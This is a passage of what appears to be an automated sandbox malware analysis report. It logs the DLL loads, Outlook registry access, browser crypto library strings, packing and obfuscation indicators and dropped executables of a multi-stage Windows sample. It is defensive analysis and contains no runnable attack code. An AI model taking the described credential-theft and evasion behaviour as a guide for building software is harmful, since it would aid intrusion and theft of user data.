Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1798144 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: file.exe Static PE information: Raw size of loxwmvpm is bigger than: 0x100000 < 0x19cc00
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2619103776.000000006C70F000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: feb3d39b6a.exe, 00000013.00000002.3346267958.0000000005FF2000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2618534099.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Source: C:\Users\user\Documents\JKECGDBFCB.exe Unpacked PE file: 14.2.JKECGDBFCB.exe.510000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 15.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 16.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 17.2.skotes.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;hjzxticg:EW;ugypvtkj:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Unpacked PE file: 18.2.2533b4b8c7.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fsoyaldh:EW;uhxnkltw:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Unpacked PE file: 19.2.feb3d39b6a.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Unpacked PE file: 20.2.815f2a8fe8.exe.bb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Unpacked PE file: 22.2.feb3d39b6a.exe.3d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kcjzlwkt:EW;cwbfsuvm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Unpacked PE file: 37.2.815f2a8fe8.exe.bb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loxwmvpm:EW;lrozqijg:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: feb3d39b6a.exe.17.dr Static PE information: real checksum: 0x1da749 should be: 0x1d5fe1
Source: 57a07eec2d.exe.17.dr Static PE information: real checksum: 0x2b1461 should be: 0x2b9d9b
Source: random[1].exe0.17.dr Static PE information: real checksum: 0x1e92b0 should be: 0x1e67a3
Source: random[2].exe0.17.dr Static PE information: real checksum: 0x2b1461 should be: 0x2b9d9b
Source: random[1].exe1.17.dr Static PE information: real checksum: 0x1da749 should be: 0x1d5fe1
Source: random[1].exe.0.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: 815f2a8fe8.exe.17.dr Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: random[1].exe.17.dr Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: skotes.exe.14.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: JKECGDBFCB.exe.0.dr Static PE information: real checksum: 0x3284f4 should be: 0x330bf4
Source: file.exe Static PE information: real checksum: 0x1bc6e1 should be: 0x1c4b12
Source: 2533b4b8c7.exe.17.dr Static PE information: real checksum: 0x1e92b0 should be: 0x1e67a3
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: loxwmvpm
Source: file.exe Static PE information: section name: lrozqijg
Source: file.exe Static PE information: section name: .taggant
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name: hjzxticg
Source: random[1].exe.0.dr Static PE information: section name: ugypvtkj
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: JKECGDBFCB.exe.0.dr Static PE information: section name:
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .idata
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: hjzxticg
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: ugypvtkj
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.14.dr Static PE information: section name:
Source: skotes.exe.14.dr Static PE information: section name: .idata
Source: skotes.exe.14.dr Static PE information: section name: hjzxticg
Source: skotes.exe.14.dr Static PE information: section name: ugypvtkj
Source: skotes.exe.14.dr Static PE information: section name: .taggant
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: .idata
Source: random[1].exe.17.dr Static PE information: section name:
Source: random[1].exe.17.dr Static PE information: section name: loxwmvpm
Source: random[1].exe.17.dr Static PE information: section name: lrozqijg
Source: random[1].exe.17.dr Static PE information: section name: .taggant
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .idata
Source: 815f2a8fe8.exe.17.dr Static PE information: section name:
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: loxwmvpm
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: lrozqijg
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: .taggant
Source: random[2].exe0.17.dr Static PE information: section name:
Source: random[2].exe0.17.dr Static PE information: section name: .idata
Source: random[2].exe0.17.dr Static PE information: section name: fnclnjqv
Source: random[2].exe0.17.dr Static PE information: section name: xutkjozi
Source: random[2].exe0.17.dr Static PE information: section name: .taggant
Source: 57a07eec2d.exe.17.dr Static PE information: section name:
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .idata
Source: 57a07eec2d.exe.17.dr Static PE information: section name: fnclnjqv
Source: 57a07eec2d.exe.17.dr Static PE information: section name: xutkjozi
Source: 57a07eec2d.exe.17.dr Static PE information: section name: .taggant
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: .idata
Source: random[1].exe0.17.dr Static PE information: section name:
Source: random[1].exe0.17.dr Static PE information: section name: fsoyaldh
Source: random[1].exe0.17.dr Static PE information: section name: uhxnkltw
Source: random[1].exe0.17.dr Static PE information: section name: .taggant
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .idata
Source: 2533b4b8c7.exe.17.dr Static PE information: section name:
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: fsoyaldh
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: uhxnkltw
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: .taggant
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: .idata
Source: random[1].exe1.17.dr Static PE information: section name:
Source: random[1].exe1.17.dr Static PE information: section name: kcjzlwkt
Source: random[1].exe1.17.dr Static PE information: section name: cwbfsuvm
Source: random[1].exe1.17.dr Static PE information: section name: .taggant
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .idata
Source: feb3d39b6a.exe.17.dr Static PE information: section name:
Source: feb3d39b6a.exe.17.dr Static PE information: section name: kcjzlwkt
Source: feb3d39b6a.exe.17.dr Static PE information: section name: cwbfsuvm
Source: feb3d39b6a.exe.17.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B536 push ecx; ret 0_2_6C50B549
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0052D91C push ecx; ret 14_2_0052D92F
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_00521359 push es; ret 14_2_0052135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D4D91C push ecx; ret 15_2_00D4D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D4D91C push ecx; ret 16_2_00D4D92F
Source: file.exe Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: random[1].exe.0.dr Static PE information: section name: entropy: 7.083133220156074
Source: JKECGDBFCB.exe.0.dr Static PE information: section name: entropy: 7.083133220156074
Source: skotes.exe.14.dr Static PE information: section name: entropy: 7.083133220156074
Source: random[1].exe.17.dr Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: 815f2a8fe8.exe.17.dr Static PE information: section name: loxwmvpm entropy: 7.954088066155708
Source: random[2].exe0.17.dr Static PE information: section name: entropy: 7.799262699092027
Source: 57a07eec2d.exe.17.dr Static PE information: section name: entropy: 7.799262699092027
Source: random[1].exe0.17.dr Static PE information: section name: fsoyaldh entropy: 7.942516557300243
Source: 2533b4b8c7.exe.17.dr Static PE information: section name: fsoyaldh entropy: 7.942516557300243
Source: random[1].exe1.17.dr Static PE information: section name: entropy: 7.975138897205294
Source: random[1].exe1.17.dr Static PE information: section name: kcjzlwkt entropy: 7.953160073987712
Source: feb3d39b6a.exe.17.dr Static PE information: section name: entropy: 7.975138897205294
Source: feb3d39b6a.exe.17.dr Static PE information: section name: kcjzlwkt entropy: 7.953160073987712

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\Documents\JKECGDBFCB.exe Jump to dropped file
Drops PE files
